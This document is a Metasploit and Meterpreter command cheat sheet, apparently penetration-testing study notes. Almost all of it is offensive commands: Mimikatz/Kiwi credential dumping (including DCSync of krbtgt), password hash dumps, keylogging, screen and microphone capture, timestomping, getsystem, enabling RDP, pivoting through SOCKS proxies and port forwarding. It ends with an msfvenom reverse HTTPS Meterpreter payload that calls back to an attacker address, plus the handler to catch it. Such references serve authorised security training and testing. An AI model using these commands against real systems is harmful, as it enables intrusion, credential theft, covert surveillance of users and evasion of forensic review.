Metasploit

Start database

sudo msfdb run  

Database initialization

sudo msfdb init 

Delete existing databases (non-interactive, accepting defaults)

msfdb --use-defaults delete

Database initialization (non-interactive, accepting defaults)

msfdb --use-defaults init

Database status

msfdb status

Workspaces management

msf6 > workspace                // list workspaces
msf6 > workspace -a <WORKSPACE> // add workspace
msf6 > workspace -r <OLD> <NEW> // rename workspace
msf6 > workspace -d <WORKSPACE> // delete workspace
msf6 > workspace -D             // delete all workspaces

Nmap integration

msf6 > db_nmap <OPTIONS>        // run nmap and add output to database

Hosts and services

msf6 > hosts                    // read hosts from database
msf6 > services                 // read services from database
msf6 > vulns                    // show vulnerabilities

Searching and configuration

msf6 > search                   // search within metasploit
msf6 > set RHOST <RHOST>        // set remote host
msf6 > set RPORT <RPORT>        // set remote port
msf6 > set VERBOSE true         // enable verbose output
msf6 > set forceexploit true    // run the exploit even when the check reports the target as not vulnerable
msf6 > set EXITFUNC thread      // payload exits only its own thread, so the host process keeps running
msf6 > set AutoLoadStdapi false // disable stdapi autoload
msf6 > set PrependMigrate true  // enable automatic migration
msf6 > set PrependMigrateProc explorer.exe // auto migrate to explorer.exe

Modules (module types, selected with use <TYPE>/PATH/TO/MODULE)

msf6 > use exploit/<PATH>       // exploit module
msf6 > use payload/<PATH>       // payload module
msf6 > use auxiliary/<PATH>     // auxiliary module
msf6 > use encoder/<PATH>       // encoder module
msf6 > use nop/<PATH>           // nop module
msf6 > use post/PATH/TO/MODULE                    // use post exploitation module
msf6 > use post/linux/gather/hashdump             // hashdump on Linux
msf6 > use post/multi/manage/shell_to_meterpreter // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload // specific module

Sessions

msf6 > show sessions            // show active sessions
msf6 > sessions -l              // list the sessions
msf6 > sessions -i 1            // switch to session 1
msf6 > sessions -u <ID>         // upgrade shell to meterpreter
msf6 > sessions -k <ID>         // kill specific session
msf6 > sessions -K              // kill all sessions

Jobs and payloads

msf6 > jobs                     // show current jobs
msf6 > show payloads            // show available payloads

Spool and save

msf6 > spool /PATH/TO/FILE      // record output
msf6 > save                     // save current state

Meterpreter - Basic operations

C:\> Ctrl + z                   // background the active shell session and return to msfconsole
meterpreter > load stdapi       // load the stdapi extension (needed when AutoLoadStdapi is false)
meterpreter > background        // send session to background
meterpreter > shell             // get system shell
meterpreter > channel -i <ID>   // interact with an existing meterpreter channel

Meterpreter - System info and migration

meterpreter > ps                // list processes
meterpreter > migrate 2236      // migrate into the process with PID 2236 (taken from ps)
meterpreter > getuid            // get current user
meterpreter > sysinfo           // get system information

Meterpreter - File and network operations

meterpreter > search -f <FILE>  // search for a file
meterpreter > upload            // upload local files
meterpreter > ipconfig          // network configuration
meterpreter > download <file>   // download a file from the target to the local machine
meterpreter > lcd <path>        // change the local (attacker-side) working directory

PowerShell Integration

meterpreter > load powershell
meterpreter > powershell_shell
meterpreter > powershell_execute
meterpreter > powershell_import
meterpreter > powershell_session_remove
meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress'
meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }'
meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded'

Mimikatz (Kiwi)

meterpreter > load kiwi
meterpreter > help kiwi
meterpreter > kiwi_cmd
meterpreter > lsa_dump_sam
meterpreter > dcsync_ntlm krbtgt
meterpreter > creds_all
meterpreter > creds_msv
meterpreter > creds_kerberos
meterpreter > creds_ssp
meterpreter > creds_wdigest
meterpreter > getprivs
meterpreter > getsystem
meterpreter > hashdump

Post-Exploitation Modules

meterpreter > run post/windows/gather/checkvm
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/windows/manage/enable_rdp
meterpreter > run post/multi/manage/autoroute
meterpreter > run auxiliary/server/socks4a

Keylogging & Screen

meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > screenshare
meterpreter > screenshare -q 100
meterpreter > record_mic

Timestomping & Execution

meterpreter > timestomp
meterpreter > execute -f calc.exe

Pivoting

msf6 > route add 172.16.5.0/24 <session>
msf6 > route print
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVHOST 127.0.0.1
msf6 > set VERSION 5
msf6 > run -j
kali@kali:~$ tail /etc/proxychains4.conf
#       proxy types: http, socks4, socks5, raw
#         * raw: The traffic is simply forwarded to the proxy without modification.
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080

kali@kali:~$ sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza

Port Forwarding

meterpreter > portfwd add -l <LPORT> -p <RPORT> -r <RHOST>
kali@kali:~$ sudo xfreerdp /v:127.0.0.1 /u:luiza

Establish a meterpreter reverse shell from a compromised host (generate the payload with msfvenom, then catch the callback with exploit/multi/handler)

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.45.221 LPORT=2233 -f exe -o met.exe
msf6 > set payload windows/x64/meterpreter_reverse_https 
msf6 > set lhost 192.168.45.221
msf6 > set lport 2233
msf6 > exploit -j
